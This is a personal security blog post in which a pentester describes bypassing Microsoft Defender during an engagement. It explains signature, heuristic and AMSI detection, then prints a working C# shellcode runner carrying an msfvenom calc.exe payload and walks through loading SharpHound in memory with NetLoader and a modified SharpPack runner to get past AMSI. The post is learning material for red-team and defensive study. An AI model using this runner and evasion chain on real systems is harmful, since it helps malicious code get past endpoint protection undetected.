<!doctype html>
<!--
  Minimal Mistakes Jekyll Theme 4.26.2 by Michael Rose
  Copyright 2013-2024 Michael Rose - mademistakes.com | @mmistakes
  Free for personal and commercial use under the MIT license
  https://github.com/mmistakes/minimal-mistakes/blob/master/LICENSE
-->

<html lang="en" class="no-js">
  <head>
    <meta charset="utf-8">

<!-- begin _includes/seo.html --><title>How to bypass Defender in a few easy steps - arty-hlr</title>
<meta name="description" content="What one can learn about AV bypass during a pentest!">



<meta property="og:type" content="article">
<meta property="og:locale" content="en_US">
<meta property="og:site_name" content="arty-hlr">
<meta property="og:title" content="How to bypass Defender in a few easy steps">
<meta property="og:url" content="http://localhost:4000/2021/05/06/how-to-bypass-defender/">


  <meta property="og:description" content="What one can learn about AV bypass during a pentest!">







  <meta property="article:published_time" content="2021-05-06T00:00:00+02:00">






<link rel="canonical" href="http://localhost:4000/2021/05/06/how-to-bypass-defender/">












<!-- end _includes/seo.html -->



  <link href="/feed.xml" type="application/atom+xml" rel="alternate" title="arty-hlr Feed">
<meta name="viewport" content="width=device-width, initial-scale=1.0">

<script type="text/javascript">
  document.documentElement.className = document.documentElement.className.replace(/\bno-js\b/g, '') + ' js ';
  
</script>

<!-- For all browsers -->
<link rel="stylesheet" href="/assets/css/main.css">
<link rel="preload" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@latest/css/all.min.css" as="style" onload="this.onload=null;this.rel='stylesheet'">
<noscript><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@latest/css/all.min.css"></noscript>



    <!-- start custom head snippets -->

<!-- insert favicons. use https://realfavicongenerator.net/ -->

<!-- end custom head snippets -->

  </head>

  <body class="layout--single wide" dir="ltr">
    <nav class="skip-links">
  <ul>
    <li><a href="#site-nav" class="screen-reader-shortcut">Skip to primary navigation</a></li>
    <li><a href="#main" class="screen-reader-shortcut">Skip to content</a></li>
    <li><a href="#footer" class="screen-reader-shortcut">Skip to footer</a></li>
  </ul>
</nav>

    

<div class="masthead">
  <div class="masthead__inner-wrap">
    <div class="masthead__menu">
      <nav id="site-nav" class="greedy-nav">
        
        <a class="site-title" href="/">
          arty-hlr
          
        </a>
        <ul class="visible-links"><li class="masthead__menu-item">
              <a
                href="/"
                
                
              >Home</a>
            </li><li class="masthead__menu-item">
              <a
                href="/about/"
                
                
              >About</a>
            </li></ul>
        
        <button class="search__toggle" type="button">
          <span class="visually-hidden">Toggle search</span>
          <i class="fas fa-search"></i>
        </button>
        
        <button class="greedy-nav__toggle hidden" type="button">
          <span class="visually-hidden">Toggle menu</span>
          <div class="navicon"></div>
        </button>
        <ul class="hidden-links hidden"></ul>
      </nav>
    </div>
  </div>
</div>


    <div class="initial-content">
      





<div id="main" role="main">
  


  <article class="page" itemscope itemtype="https://schema.org/CreativeWork">
    <meta itemprop="headline" content="How to bypass Defender in a few easy steps">
    <meta itemprop="description" content="What one can learn about AV bypass during a pentest!">
    <meta itemprop="datePublished" content="2021-05-06T00:00:00+02:00">
    

    <div class="page__inner-wrap">
      
        <header>
          <h1 id="page-title" class="page__title" itemprop="headline">
            <a href="http://localhost:4000/2021/05/06/how-to-bypass-defender/" itemprop="url">How to bypass Defender in a few easy steps
</a>
          </h1>
          

  <p class="page__meta">
    
      
      <span class="page__meta-date">
        <i class="far fa-calendar-alt" aria-hidden="true"></i>
        
        <time datetime="2021-05-06T00:00:00+02:00">May 6, 2021</time>
      </span>
    

    

    
  </p>


        </header>
      

      <section class="page__content" itemprop="text">
        
          <aside class="sidebar__right ">
            <nav class="toc">
              <header><h4 class="nav__title"><i class="fas fa-file-alt"></i> On this page</h4></header>
              <ul class="toc__menu"><li><a href="#basics-of-how-av-works">Basics of how AV works</a><ul><li><a href="#signatures">Signatures</a></li><li><a href="#heuristics">Heuristics</a></li><li><a href="#what-happens-when-stuff-is-not-on-disk">What happens when stuff is not on disk?</a></li></ul></li><li><a href="#first-approach-changing-strings-and-obfuscation">First approach: Changing strings and obfuscation</a></li><li><a href="#second-approach-homemade-c-runner">Second approach: Homemade C# runner</a></li><li><a href="#third-approach-payload-delivery">Third approach: Payload delivery</a></li><li><a href="#conclusion">Conclusion</a></li></ul>
            </nav>
          </aside>
        
        <p>In a recent pentest I had the opportunity to spend a bit of time in a windows VM in an AD environment via RDP to test their hardening. Along the way, from very basic techniques to some more advanced ones, I learned a lot about DotNet, how antivirus engines work, and how to bypass them. I did manage to bypass Defender in the pentest, and run some nice stuff, and wanted to make a blog post for people who like me a few days ago had very little experience with bypassing antivirus software. Enjoy your stay :)</p>

<h1 id="basics-of-how-av-works">Basics of how AV works</h1>

<p>Before we dive in in which solutions I tried, let’s recap a bit on how AV works with files on disk (no AI, basics):</p>
<ul>
  <li>signature detection</li>
  <li>heuristics detection</li>
  <li>in memory detection</li>
</ul>

<h2 id="signatures">Signatures</h2>

<p>The basic functionality and earliest one was to compare the hash of a file, or part of a file, with hashes of known malicious files. This can be the hash of the whole file, or just from a few bytes or strings that are at the core of the malicious activity.</p>

<h2 id="heuristics">Heuristics</h2>

<p>The next level in antivirus school when signatures or not enough, is thinking about emulating the executable that wants to run <em>before</em> it is actually run. That means going through the assembly instructions or lines of code, and checking what happens when they are run. Based on the behaviour observed, the AV can decide a file is malicious and not allow the file to run after having been emulated.</p>

<h2 id="what-happens-when-stuff-is-not-on-disk">What happens when stuff is not on disk?</h2>

<p>One last important thing to mention is AMSI: the response of Microsoft to malicious software not even touching the disk. When an executable on disk is run, it is scanned/emulated before being allowed to run, but what happens if that executable is already in memory and loaded from somewhere else? AMSI is a Windows API that allows developers of software that allows execution of scripts for example (think PowerShell, VBA macros in Office, reflection for C# assembly) to request an AMSI scan before letting the thing in memory run.</p>

<h1 id="first-approach-changing-strings-and-obfuscation">First approach: Changing strings and obfuscation</h1>

<p>So let’s try to bypass the first layer of AV: signature detection. My first attempt was to run my C# SharpHound.exe for example through <a href="https://github.com/matterpreter/DefenderCheck">DefenderCheck</a>, <a href="https://github.com/PowerShellMafia/PowerSploit/blob/master/AntivirusBypass/Find-AVSignature.ps1">Find-AVSignature</a>, and manual scans on <a href="https://antiscan.me/">AntiScan.me</a> and <a href="https://www.virustotal.com/gui/">VirusTotal</a> to try to find out what part of the code was triggering the AV software. Through trial and error, and going through smaller and smaller parts of the file, you can find out what strings trigger AV to refactor those string in Visual Studio, or change individual bytes of the executable. The downside of the last method is that it will most likely break the executable as assembly instructions are overwritten, and needs reverse engineering to figure out what exactly was changed and whether it can be fixed, which takes time and effort staring at disassembled binary code. Not great, we’re lazy, and we’d have to do that for each AV software we want to bypass. Meh.</p>

<p>Another method, try to change the code so much that it doesn’t look like anything anymore. I mean, try to obfuscate the code. Such tools as <a href="https://github.com/mkaring/ConfuserEx">ConfuserEx</a> can do this for .Net applications. This works to a certain extent, and could have been enough some years ago, but nowadays still doesn’t bypass any heuristics detection. Well, it was worth a try.</p>

<h1 id="second-approach-homemade-c-runner">Second approach: Homemade C# runner</h1>

<p>My next attempt shames me a bit. But here’s what I tried: I knew of shellcode runners to execute msfvenom generated payloads in C# thanks to WinAPI calls. The basic runner code looks like this:</p>

<div class="language-csharp highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">using</span> <span class="nn">System</span><span class="p">;</span>
<span class="k">using</span> <span class="nn">System.Diagnostics</span><span class="p">;</span>
<span class="k">using</span> <span class="nn">System.Runtime.InteropServices</span><span class="p">;</span>
<span class="k">using</span> <span class="nn">System.Net</span><span class="p">;</span>
<span class="k">using</span> <span class="nn">System.Text</span><span class="p">;</span>
<span class="k">using</span> <span class="nn">System.Threading</span><span class="p">;</span>
<span class="k">using</span> <span class="nn">System.IO</span><span class="p">;</span>

<span class="k">namespace</span> <span class="nn">Shellcode_Runner</span>
<span class="p">{</span>
    <span class="k">class</span> <span class="nc">Program</span>
    <span class="p">{</span>
        <span class="p">[</span><span class="nf">DllImport</span><span class="p">(</span><span class="s">"kernel32.dll"</span><span class="p">,</span> <span class="n">SetLastError</span> <span class="p">=</span> <span class="k">true</span><span class="p">,</span> <span class="n">ExactSpelling</span> <span class="p">=</span> <span class="k">true</span><span class="p">)]</span>
        <span class="k">static</span> <span class="k">extern</span> <span class="n">IntPtr</span> <span class="nf">VirtualAlloc</span><span class="p">(</span><span class="n">IntPtr</span> <span class="n">lpAddress</span><span class="p">,</span> <span class="kt">uint</span> <span class="n">dwSize</span><span class="p">,</span> <span class="kt">uint</span> <span class="n">flAllocationType</span><span class="p">,</span> <span class="kt">uint</span> <span class="n">flProtect</span><span class="p">);</span>

        <span class="p">[</span><span class="nf">DllImport</span><span class="p">(</span><span class="s">"kernel32.dll"</span><span class="p">)]</span>
        <span class="k">static</span> <span class="k">extern</span> <span class="n">IntPtr</span> <span class="nf">CreateThread</span><span class="p">(</span><span class="n">IntPtr</span> <span class="n">lpThreadAttributes</span><span class="p">,</span> <span class="kt">uint</span> <span class="n">dwStackSize</span><span class="p">,</span> <span class="n">IntPtr</span> <span class="n">lpStartAddress</span><span class="p">,</span> <span class="n">IntPtr</span> <span class="n">lpParameter</span><span class="p">,</span> <span class="kt">uint</span> <span class="n">dwCreatingFlags</span><span class="p">,</span> <span class="n">IntPtr</span> <span class="n">lpThreadId</span><span class="p">);</span>

        <span class="p">[</span><span class="nf">DllImport</span><span class="p">(</span><span class="s">"kernel32.dll"</span><span class="p">)]</span>
        <span class="k">static</span> <span class="k">extern</span> <span class="n">UInt32</span> <span class="nf">WaitForSingleObject</span><span class="p">(</span><span class="n">IntPtr</span> <span class="n">hHandle</span><span class="p">,</span> <span class="n">UInt32</span> <span class="n">dwMilliseconds</span><span class="p">);</span>

        <span class="k">static</span> <span class="k">void</span> <span class="nf">Main</span><span class="p">(</span><span class="kt">string</span><span class="p">[]</span> <span class="n">args</span><span class="p">)</span>
        <span class="p">{</span>
            <span class="c1">// msfvenom -p windows/exec cmd=calc.exe exitfunc=thread -a x64 -f base64</span>
            <span class="kt">string</span> <span class="n">b64_payload</span> <span class="p">=</span> <span class="s">"/EiD5PDowAAAAEFRQVBSUVZIMdJlSItSYEiLUhhIi1IgSItyUEgPt0pKTTHJSDHArDxhfAIsIEHByQ1BAcHi7VJBUUiLUiCLQjxIAdCLgIgAAABIhcB0Z0gB0FCLSBhEi0AgSQHQ41ZI/8lBizSISAHWTTHJSDHArEHByQ1BAcE44HXxTANMJAhFOdF12FhEi0AkSQHQZkGLDEhEi0AcSQHQQYsEiEgB0EFYQVheWVpBWEFZQVpIg+wgQVL/4FhBWVpIixLpV////11IugEAAAAAAAAASI2NAQEAAEG6MYtvh//Vu+AdKgpBuqaVvZ3/1UiDxCg8BnwKgPvgdQW7RxNyb2oAWUGJ2v/VY2FsYy5leGUA"</span><span class="p">;</span>
            <span class="kt">byte</span><span class="p">[]</span> <span class="n">buf</span> <span class="p">=</span> <span class="n">System</span><span class="p">.</span><span class="n">Convert</span><span class="p">.</span><span class="nf">FromBase64String</span><span class="p">(</span><span class="n">b64_payload</span><span class="p">);</span>

            <span class="kt">int</span> <span class="n">size</span> <span class="p">=</span> <span class="n">buf</span><span class="p">.</span><span class="n">Length</span><span class="p">;</span>
            <span class="n">IntPtr</span> <span class="n">addr</span> <span class="p">=</span> <span class="nf">VirtualAlloc</span><span class="p">(</span><span class="n">IntPtr</span><span class="p">.</span><span class="n">Zero</span><span class="p">,</span> <span class="m">0x1000</span><span class="p">,</span> <span class="m">0x3000</span><span class="p">,</span> <span class="m">0x40</span><span class="p">);</span>
            <span class="n">Marshal</span><span class="p">.</span><span class="nf">Copy</span><span class="p">(</span><span class="n">buf</span><span class="p">,</span> <span class="m">0</span><span class="p">,</span> <span class="n">addr</span><span class="p">,</span> <span class="n">size</span><span class="p">);</span>
            <span class="n">IntPtr</span> <span class="n">hThread</span> <span class="p">=</span> <span class="nf">CreateThread</span><span class="p">(</span><span class="n">IntPtr</span><span class="p">.</span><span class="n">Zero</span><span class="p">,</span> <span class="m">0</span><span class="p">,</span> <span class="n">addr</span><span class="p">,</span> <span class="n">IntPtr</span><span class="p">.</span><span class="n">Zero</span><span class="p">,</span> <span class="m">0</span><span class="p">,</span> <span class="n">IntPtr</span><span class="p">.</span><span class="n">Zero</span><span class="p">);</span>
            <span class="n">Thread</span><span class="p">.</span><span class="nf">Sleep</span><span class="p">(</span><span class="m">10000</span><span class="p">);</span>
            <span class="nf">WaitForSingleObject</span><span class="p">(</span><span class="n">hThread</span><span class="p">,</span> <span class="m">0xFFFFFFFF</span><span class="p">);</span>
        <span class="p">}</span>
    <span class="p">}</span>
<span class="p">}</span>
</code></pre></div></div>

<p>And little me thought, well if I can run shellcode with it, why not try to load the whole EXE file in base64 and have it executed like shellcode. I mean why wouldn’t it work? :D Obviously, I noticed after a few failed attempts that EXE and especially C# compiled EXE were <strong>not</strong> shellcode, and that <em>obviously</em> loading the whole EXE to be executed as assembly instructions would not work, just because of the PE headers, never mind how C# is actually compiled, I remembered some time into trying that it was a managed languaged and compiled into intermediary code… Even my efforts to transform it to shellcode with <a href="https://github.com/hasherezade/pe_to_shellcode">pe_to_shellcode</a> which changes the PE header to be executable (obviously not gonna work with C# still) or <a href="https://github.com/TheWover/donut">Donut</a> (which should have worked? no idea why not) did not bring any fruit.</p>

<p>BUT, I wrote a shellcode runner! The next step would have been to work on escaping signature detection by encrypting the payload, and heuristics detection by messing with our behaviour (which will be the subject of another blog post probably where I focus on bypassing AV for shellcode without the solution I ended up using here). So, onto my next attempt.</p>

<h1 id="third-approach-payload-delivery">Third approach: Payload delivery</h1>

<p>So if I can’t obfuscate enough a C# executable, or go around the heuristics analysis by running it as shellcode, maybe there’s another way to not touch the disk. I had used <a href="https://github.com/Flangvik/NetLoader">NetLoader</a> before during the CRTE bootcamp, without really understanding what it did and what it was for, but let’s dive in (a bit) now:</p>

<p>NetLoader is a C# tool that loads C# assembly from a path, URL, or SMB share via reflection (a topic for another blog post problaby, but see it as a shellcode runner but for C# assembly) and patches AMSI to bypass it. This means that the malicious C# executable doesn’t have to touch the disk at all, which is a good thing for us, and as it bypasses AMSI (another topic for a later blogpost), this could mean bypassing Defender completely. The only thing is, will it be allowed to run? Well, apparently Microsoft hasn’t added a signature for NetLoader, because it is!</p>

<p>First success: running any malicious C# executable!
<img src="http://localhost:4000/assets/images/run_exe.png" alt="SharpHound.exe run successfully" /></p>

<p>But that wasn’t enough for me, I wanted to be able to run PowerShell scripts as well… but that didn’t work with NetLoader, so onto another tool for payload delivery and AMSY bypass, <a href="https://github.com/mdsecactivebreach/SharpPack">SharpPack</a>:</p>

<p>SharpPack needed a bit of refactoring for my purposes, as the project compiles to a DLL by default, which makes sense for more opsec safe ways, like <a href="https://github.com/tyranid/DotNetToJScript">DotNetToJScript</a> or in an Office VBA macro, as described in <a href="https://www.mdsec.co.uk/2018/12/sharppack-the-insider-threat-toolkit/">this</a> blog post, but I just wanted a normal C# executable that I would then run with NetLoader.</p>

<p>I changed the project to compiling to an exe, and added a main:</p>

<div class="language-csharp highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">using</span> <span class="nn">System</span><span class="p">;</span>
<span class="k">using</span> <span class="nn">SharpPack</span><span class="p">;</span>

<span class="k">namespace</span> <span class="nn">SharpPackRunner</span>
<span class="p">{</span>
    <span class="k">class</span> <span class="nc">Program</span>
    <span class="p">{</span>
        <span class="k">static</span> <span class="k">void</span> <span class="nf">usage</span><span class="p">()</span>
        <span class="p">{</span>
            <span class="n">System</span><span class="p">.</span><span class="n">Console</span><span class="p">.</span><span class="nf">WriteLine</span><span class="p">(</span><span class="s">"Usage: SharpPackRunner.exe -D/-P &lt;encpath&gt; &lt;encpass&gt; &lt;outfile&gt; &lt;name&gt; &lt;args&gt;"</span><span class="p">);</span>
            <span class="k">return</span><span class="p">;</span>
        <span class="p">}</span>
        <span class="k">static</span> <span class="k">void</span> <span class="nf">Main</span><span class="p">(</span><span class="kt">string</span><span class="p">[]</span> <span class="n">args</span><span class="p">)</span>
        <span class="p">{</span>
            <span class="k">if</span> <span class="p">(</span><span class="n">args</span><span class="p">.</span><span class="n">Length</span> <span class="p">!=</span> <span class="m">6</span><span class="p">)</span>
            <span class="p">{</span>
                <span class="nf">usage</span><span class="p">();</span>
                <span class="k">return</span><span class="p">;</span>
            <span class="p">}</span>

            <span class="kt">var</span> <span class="n">sp</span> <span class="p">=</span> <span class="k">new</span> <span class="nf">SharpPackClass</span><span class="p">();</span>
            <span class="k">if</span> <span class="p">(</span><span class="n">String</span><span class="p">.</span><span class="nf">Equals</span><span class="p">(</span><span class="n">args</span><span class="p">[</span><span class="m">0</span><span class="p">],</span> <span class="s">"-D"</span><span class="p">))</span>
                <span class="n">sp</span><span class="p">.</span><span class="nf">RunDotNet</span><span class="p">(</span><span class="n">args</span><span class="p">[</span><span class="m">1</span><span class="p">],</span> <span class="n">args</span><span class="p">[</span><span class="m">2</span><span class="p">],</span> <span class="n">args</span><span class="p">[</span><span class="m">3</span><span class="p">],</span> <span class="n">args</span><span class="p">[</span><span class="m">4</span><span class="p">],</span> <span class="n">args</span><span class="p">[</span><span class="m">5</span><span class="p">]);</span>
            <span class="k">else</span> <span class="k">if</span> <span class="p">(</span><span class="n">String</span><span class="p">.</span><span class="nf">Equals</span><span class="p">(</span><span class="n">args</span><span class="p">[</span><span class="m">0</span><span class="p">],</span> <span class="s">"-P"</span><span class="p">))</span>
                <span class="n">sp</span><span class="p">.</span><span class="nf">RunPowerShell</span><span class="p">(</span><span class="n">args</span><span class="p">[</span><span class="m">1</span><span class="p">],</span> <span class="n">args</span><span class="p">[</span><span class="m">2</span><span class="p">],</span> <span class="n">args</span><span class="p">[</span><span class="m">3</span><span class="p">],</span> <span class="n">args</span><span class="p">[</span><span class="m">4</span><span class="p">],</span> <span class="n">args</span><span class="p">[</span><span class="m">5</span><span class="p">]);</span>
            <span class="k">else</span>
                <span class="nf">usage</span><span class="p">();</span>
        <span class="p">}</span>
    <span class="p">}</span>
<span class="p">}</span>
</code></pre></div></div>
<p>(I was looking for a more elegant solution like unpacking an array into arguments like <code class="language-plaintext highlighter-rouge">*array</code> in python, but apparently this is not possible in C# without refactoring the method)</p>

<p>So I ended up with a C# executable that I could run with NetLoader, and that can extract a C# malicious executable or PowerShell script from an encrypted zip file, run it, and send the output to a text file. The code can probably be changed to load executables and scripts from a URL or share like NetLoader and show the output instead of sending it to a text file so that nothing is on disk at all, but it didn’t have that much time to dive into the source code to be honest.</p>

<p>I added a line at the end of the SharpHound.ps1 script with <code class="language-plaintext highlighter-rouge">Invoke-BloodHound -CollectionMethod All</code> to load and run SharpHound (although reading MDSec’s blogpost again I could have given that line as the last argument to SharpPack probably), and could now run PowerShell scripts!</p>

<p><img src="http://localhost:4000/assets/images/run_powershell.png" alt="SharpHound.ps1 run successfully" /></p>

<p>My quest was complete!</p>

<h1 id="conclusion">Conclusion</h1>

<p>I did manage to bypass Defender, and I learned a lot of things about antivirus software in the process, but I didn’t dive very deep into bypassing AMSI and the reflection mechanism in C#, which could be the topics of future blog posts. I hope this post was clear enough, if I made any mistake in explaining, let me know in an issue or on Discord (arty-hlr#1427)!</p>

        
      </section>

      <footer class="page__meta">
        
        


        

  <p class="page__date"><strong><i class="fas fa-fw fa-calendar-alt" aria-hidden="true"></i> Updated:</strong> <time class="dt-published" datetime="2021-05-06T00:00:00+02:00">May 6, 2021</time></p>

      </footer>

      <section class="page__share">
  

  <a href="https://twitter.com/intent/tweet?text=How+to+bypass+Defender+in+a+few+easy+steps%20http%3A%2F%2Flocalhost%3A4000%2F2021%2F05%2F06%2Fhow-to-bypass-defender%2F" class="btn btn--twitter" onclick="window.open(this.href, 'window', 'left=20,top=20,width=500,height=500,toolbar=1,resizable=0'); return false;" title="Share on Twitter"><i class="fab fa-fw fa-twitter" aria-hidden="true"></i><span> Twitter</span></a>

  <a href="https://www.facebook.com/sharer/sharer.php?u=http%3A%2F%2Flocalhost%3A4000%2F2021%2F05%2F06%2Fhow-to-bypass-defender%2F" class="btn btn--facebook" onclick="window.open(this.href, 'window', 'left=20,top=20,width=500,height=500,toolbar=1,resizable=0'); return false;" title="Share on Facebook"><i class="fab fa-fw fa-facebook" aria-hidden="true"></i><span> Facebook</span></a>

  <a href="https://www.linkedin.com/shareArticle?mini=true&url=http://localhost:4000/2021/05/06/how-to-bypass-defender/" class="btn btn--linkedin" onclick="window.open(this.href, 'window', 'left=20,top=20,width=500,height=500,toolbar=1,resizable=0'); return false;" title="Share on LinkedIn"><i class="fab fa-fw fa-linkedin" aria-hidden="true"></i><span> LinkedIn</span></a>
</section>


      
  <nav class="pagination">
    
      <a href="/2021/02/15/crte-review/" class="pagination--pager" title="CRTE Bootcamp Review
">Previous</a>
    
    
      <a href="#" class="pagination--pager disabled">Next</a>
    
  </nav>

    </div>

    
  </article>

  
  
    
<div class="page__related">
  
  <h2 class="page__related-title">You May Also Enjoy</h2>
  <div class="grid__wrapper">
    
      
      



<div class="grid__item">
  <article class="archive__item" itemscope itemtype="https://schema.org/CreativeWork">
    
    <h2 class="archive__item-title no_toc" itemprop="headline">
      
        <a href="/2021/02/15/crte-review/" rel="permalink">CRTE Bootcamp Review
</a>
      
    </h2>
    

  <p class="page__meta">
    
      
      <span class="page__meta-date">
        <i class="far fa-calendar-alt" aria-hidden="true"></i>
        
        <time datetime="2021-02-15T00:00:00+01:00">February 15, 2021</time>
      </span>
    

    

    
  </p>


    <p class="archive__item-excerpt" itemprop="description">A review of Altered Security’s advanced AD course
</p>
  </article>
</div>

    
      
      



<div class="grid__item">
  <article class="archive__item" itemscope itemtype="https://schema.org/CreativeWork">
    
    <h2 class="archive__item-title no_toc" itemprop="headline">
      
        <a href="/2020/12/25/offshore-review/" rel="permalink">Offshore Review
</a>
      
    </h2>
    

  <p class="page__meta">
    
      
      <span class="page__meta-date">
        <i class="far fa-calendar-alt" aria-hidden="true"></i>
        
        <time datetime="2020-12-25T00:00:00+01:00">December 25, 2020</time>
      </span>
    

    

    
  </p>


    <p class="archive__item-excerpt" itemprop="description">My journey through HTB’s Offshore Pro Lab!
</p>
  </article>
</div>

    
      
      



<div class="grid__item">
  <article class="archive__item" itemscope itemtype="https://schema.org/CreativeWork">
    
    <h2 class="archive__item-title no_toc" itemprop="headline">
      
        <a href="/2020/12/15/ecxd-review/" rel="permalink">eLearnSecurity Certified eXploit Developer Review
</a>
      
    </h2>
    

  <p class="page__meta">
    
      
      <span class="page__meta-date">
        <i class="far fa-calendar-alt" aria-hidden="true"></i>
        
        <time datetime="2020-12-15T00:00:00+01:00">December 15, 2020</time>
      </span>
    

    

    
  </p>


    <p class="archive__item-excerpt" itemprop="description">A review of the XDS course/eCXD exam by eLS
</p>
  </article>
</div>

    
      
      



<div class="grid__item">
  <article class="archive__item" itemscope itemtype="https://schema.org/CreativeWork">
    
    <h2 class="archive__item-title no_toc" itemprop="headline">
      
        <a href="/2019/12/29/shellcode/" rel="permalink">Shellcode writing and new tools
</a>
      
    </h2>
    

  <p class="page__meta">
    
      
      <span class="page__meta-date">
        <i class="far fa-calendar-alt" aria-hidden="true"></i>
        
        <time datetime="2019-12-29T00:00:00+01:00">December 29, 2019</time>
      </span>
    

    

    
  </p>


    <p class="archive__item-excerpt" itemprop="description">Documenting my journey writing shellcode
</p>
  </article>
</div>

    
  </div>
</div>

  
  
</div>

      
    </div>

    
      <div class="search-content">
        <div class="search-content__inner-wrap"><form class="search-content__form" onkeydown="return event.key != 'Enter';" role="search">
    <label class="sr-only" for="search">
      Enter your search term...
    </label>
    <input type="search" id="search" class="search-input" tabindex="-1" placeholder="Enter your search term..." />
  </form>
  <div id="results" class="results"></div></div>

      </div>
    

    <div id="footer" class="page__footer">
      <footer>
        <!-- start custom footer snippets -->

<!-- end custom footer snippets -->
        <div class="page__footer-follow">
  <ul class="social-icons">
    

    

    
      <li><a href="/feed.xml"><i class="fas fa-fw fa-rss-square" aria-hidden="true"></i> Feed</a></li>
    
  </ul>
</div>

<div class="page__footer-copyright">&copy; 2024 <a href="http://localhost:4000">arty-hlr</a>. Powered by <a href="https://jekyllrb.com" rel="nofollow">Jekyll</a> &amp; <a href="https://mademistakes.com/work/jekyll-themes/minimal-mistakes/" rel="nofollow">Minimal Mistakes</a>.</div>

      </footer>
    </div>

    
  <script src="/assets/js/main.min.js"></script>




<script src="/assets/js/lunr/lunr.min.js"></script>
<script src="/assets/js/lunr/lunr-store.js"></script>
<script src="/assets/js/lunr/lunr-en.js"></script>






  </body>
</html>
